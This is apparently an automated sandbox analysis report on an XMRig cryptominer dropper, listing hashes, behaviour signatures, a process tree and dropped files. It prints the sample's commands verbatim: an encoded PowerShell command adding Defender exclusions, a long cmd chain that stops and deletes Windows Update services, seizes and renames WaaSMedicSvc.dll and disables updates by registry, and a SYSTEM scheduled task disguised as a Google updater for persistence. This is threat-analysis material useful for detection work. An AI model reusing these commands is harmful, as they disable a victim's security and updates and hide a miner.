Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
17-03-2023 07:57
General
-
Target
fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe
-
Size
4.3MB
-
MD5
ccaffcd12dcb30adb5250f30026ecd1e
-
SHA1
4048dc71db497f641a4f35eb00ac3c163c394978
-
SHA256
fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa
-
SHA512
a196e58aaff3f68e15df0de667541d103c78d0f8cf114ff3f5770444de1a30b0dc46c4d0dcafbc8bd81538660d401c57dc18de8b6b3769b81cc4e8ff7f316286
-
SSDEEP
98304:w1XNI4kmUg+DgxP1Wrj3DIIs0LHhjwSKVjV3:w9NInmUg5xqX/sCHhj7K5p
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 12 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 55 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Program Files\Windows\services.exe"C:\Program Files\Windows\services.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "szbaropxxftnd"4⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe nobuxigwk1 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRSWr9mZW0WjQ8Zp6uvmLE6u5mJa6blLxbhLUBAH2hxKZE3GCzRWz6VTOS4ky/ZWzvpf5adBTHBi0MDM1UFXlmNawNolHd0MlVl2JjkrKo0+8IBLupidPfw4VI3qbSIEaOjNiyslzuuxFBXtw5wQTHqdvA1/06AdulsTvF7S9CZ4A8Sy4Wq1O5AJKhxf+h2kPC8hfzfPgguSPdtoetUnybKGcvpEw1KyQLqKZRR3oNYpLLs1uRIDGCtoJYb6L/Z8pNjJ3VfajUTTtr3r8z3YZZCANKTuiSoPlOjl6tkM6iANquYBrRF8hpln6Nj10GzyuKv+UMuzm2jHgdcYvHIWu5VlaRa+GzipqrMd7FYIb8L1ivnPjVJSFAcQao9mP+a2LZhEhzxOo5HDQEsg8YcmXYPpa9+hdhm3oG1uh7mFb059O4jTv5JEyLtG/EjmQEDO7bRt6aCjLj7IOhC23zn07XDFgQpAwUJwb86rtglkKJIskH8MKibrRcKjU17oq356JU7kC1O4ZClEwn3zxsCRn1lor2TBnRi3mZeDgcxYUODmijHGaZqebzNr1I7jL4SVnCr7zAhUZQOuUcwu9hE9annEisMbni/vsVujSP7krVJ4elJme0qyMLjG1+sNcHi9dAZIssoraCroZFOnAtDzRvGg8cN8YoS46MUZJg8mI0Qbdf+lerQajWjIr0RKGqCZQ1xuG3iMqhbzxzjTcq4uxM7rPQEaeQh5GlyVEmjDNhO57C6vRA+OIXARFB1qdlw8MDw6PYSbEDaybsTrDYknMkURm5+57KX49Z9vbhteIAPMRuGLe+W/Q7zcukixvXF9qBef2RdKXca7Y0a+ENbPI5RR7Ue6orukYCW8qTzw/BerZTIsZdz2tPAWQNXFyXLl7N5E8BYSAy+XoYlMmAfKs4TOcLZHlWWWhGyIgfM5OhjOETH5CVTW9rKt08OOu8a4/6+0wAZg/JXzeo7DOwu11rCsHec3L0DgQUQ+466weHzVOPHnW3L5/ZwHpBMq5Z6v9j9q4LEufyXIarx8xLCOPLIRdn2lD84pQ85bZL3ei/oJBWwKbDZPlGBNHM3KCQHZ8JUDZEZS+1c7xrDYOZoh2zHk7F9VGp5+nYjTp9qWyW5yE147kvpbkpYy3qliugpRUyt4qfadCe1+EBZMDESEvdXlsS6pXUycuwdRTcLuU4VNAMes2kuJ6AQd62sqz3K+/30ZZggmUkjA1tlZv9/78ksWTzWkyYVbcEaqzXPQjWTKmA35HUsDbiet5zro8iAFJxq2wjtmRLhGDHMG3rV8SduK46u0eRIjpwwPlxuY+5U3IqCJe3DIjRkOm1L2av2ZWIXcWksPSJPqVO+HXHWkVh2AAqa+5REWr3PJ3w8xR3ElAij+osV6G+/rMICH4bCSB5k8fPo9JGxVDWGwZ0EP8CzrfXB5reQKnHmmXKOlqhcxLcA8C/ooNesFvHbeNYZG+AvhXKpXNyiVZCvKNP7JHOaBUriB9z0lUzAd7GdAQHUHKMKpHNpr14eYh9dcZuf2HQ3BdYSL1w96z08fRgIdMxK6VxbCvfPZ52hFFrkNF8p6SK8teLR/IGucR/X70PbdEW4Ub2MjnDd+8QfG8AI17CfCy0Vj3ftYdsAjcPiLguH1aFFVgqi8vIymdIWmGId7uV+yQ2/YWsQj+l3zAKzzjPuiR/3M1pxXS+JgjLyjgctfA==3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\services.exeFilesize
4.3MB
MD5ccaffcd12dcb30adb5250f30026ecd1e
SHA14048dc71db497f641a4f35eb00ac3c163c394978
SHA256fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa
SHA512a196e58aaff3f68e15df0de667541d103c78d0f8cf114ff3f5770444de1a30b0dc46c4d0dcafbc8bd81538660d401c57dc18de8b6b3769b81cc4e8ff7f316286
-
C:\Program Files\Windows\services.exeFilesize
4.3MB
MD5ccaffcd12dcb30adb5250f30026ecd1e
SHA14048dc71db497f641a4f35eb00ac3c163c394978
SHA256fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa
SHA512a196e58aaff3f68e15df0de667541d103c78d0f8cf114ff3f5770444de1a30b0dc46c4d0dcafbc8bd81538660d401c57dc18de8b6b3769b81cc4e8ff7f316286
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wmo52yxe.xd4.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
memory/468-214-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-211-0x0000017916E40000-0x0000017916E47000-memory.dmpFilesize
28KB
-
memory/468-215-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-218-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-217-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-216-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/672-203-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-204-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-200-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-219-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-202-0x000001A6B0B60000-0x000001A6B0B80000-memory.dmpFilesize
128KB
-
memory/672-197-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-201-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-220-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-208-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-209-0x000001A6B15A0000-0x000001A6B15E0000-memory.dmpFilesize
256KB
-
memory/672-210-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-207-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-206-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-205-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/984-192-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/984-195-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/984-212-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/1092-135-0x00000262312C0000-0x00000262312D0000-memory.dmpFilesize
64KB
-
memory/1092-134-0x00000262312C0000-0x00000262312D0000-memory.dmpFilesize
64KB
-
memory/1092-133-0x000002622EEB0000-0x000002622F2CC000-memory.dmpFilesize
4.1MB
-
memory/1092-136-0x00000262312C0000-0x00000262312D0000-memory.dmpFilesize
64KB
-
memory/2408-169-0x000001976B220000-0x000001976B230000-memory.dmpFilesize
64KB
-
memory/2408-196-0x000001976BB90000-0x000001976BBA2000-memory.dmpFilesize
72KB
-
memory/2408-167-0x000001976B220000-0x000001976B230000-memory.dmpFilesize
64KB
-
memory/2408-168-0x000001976B220000-0x000001976B230000-memory.dmpFilesize
64KB
-
memory/2952-186-0x00000218DF690000-0x00000218DF6AA000-memory.dmpFilesize
104KB
-
memory/2952-171-0x00000218DDA70000-0x00000218DDA80000-memory.dmpFilesize
64KB
-
memory/2952-185-0x00000218DF220000-0x00000218DF22A000-memory.dmpFilesize
40KB
-
memory/2952-184-0x00007FF3FF1D0000-0x00007FF3FF1E0000-memory.dmpFilesize
64KB
-
memory/2952-183-0x00000218DF670000-0x00000218DF68C000-memory.dmpFilesize
112KB
-
memory/2952-182-0x00000218DF210000-0x00000218DF21A000-memory.dmpFilesize
40KB
-
memory/2952-181-0x00000218DF430000-0x00000218DF44C000-memory.dmpFilesize
112KB
-
memory/2952-187-0x00000218DF650000-0x00000218DF658000-memory.dmpFilesize
32KB
-
memory/2952-170-0x00000218DDA70000-0x00000218DDA80000-memory.dmpFilesize
64KB
-
memory/2952-188-0x00000218DF660000-0x00000218DF666000-memory.dmpFilesize
24KB
-
memory/2952-189-0x00000218DF6B0000-0x00000218DF6BA000-memory.dmpFilesize
40KB
-
memory/3164-149-0x000002AFF3FD0000-0x000002AFF3FE0000-memory.dmpFilesize
64KB
-
memory/3164-148-0x000002AFF3FD0000-0x000002AFF3FE0000-memory.dmpFilesize
64KB
-
memory/3164-147-0x000002AFF3FD0000-0x000002AFF3FE0000-memory.dmpFilesize
64KB
-
memory/3164-137-0x000002AFF3FA0000-0x000002AFF3FC2000-memory.dmpFilesize
136KB